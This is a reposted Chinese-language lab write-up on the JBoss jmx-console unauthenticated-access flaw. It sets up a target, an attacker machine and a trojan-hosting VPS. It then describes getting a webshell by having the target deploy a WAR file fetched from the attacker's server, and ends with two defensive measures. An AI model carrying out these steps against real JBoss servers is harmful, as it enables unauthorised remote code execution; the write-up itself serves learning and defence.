淺談未授權漏洞——Jboss未授權getshell


0x01 漏洞描述

JBoss是一個基於J2EE的開放源代碼應用服務器,代碼遵循LGPL許可,可以在任何商業應用中免費使用;JBoss也是一個管理EJB的容器和服務器,支持EJB 1.1、EJB 2.0和EJB3規范。,默認情況下訪問 http://ip:8080/jmx-console 就可以瀏覽 JBoss 的部署管理的信息不需要輸入用戶名和密碼可以直接部署上傳木馬有安全隱患。

0x02 環境搭建

目標靶機:mac os
ip:192.168.2.85

攻擊機:windows 7
ip:192.168.2.86

木馬服務器:centos
ip:39.xxx.xxx.88      //安全起見隱藏個人vps

1.使用docker拉取Jboss鏡像,並且運行Jboss

docker search testjboss
docker pull testjboss/jboss:latest
docker images
docker run -p 8080:8080 -d 5661a2e31006

0x03 漏洞復現

未授權放分訪問

http://192.168.2.85:8080/jmx-console/ 無需認證進入控制頁面

利用jboss.deployment部署shell

利用vps搭建遠程木馬服務器

在下圖的地方訪問木馬服務器http://39.xxx.xxx.88/test3693.war (圖片填寫地址有誤,請參考自己的vps地址)

上傳war包木馬成功

訪問http://192.168.2.85:8080/test3693/

漏洞利用成功...

0x04 防御措施

  • 對jmx控制頁面訪問添加訪問驗證。
  • 進行JMX Console 安全配置。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM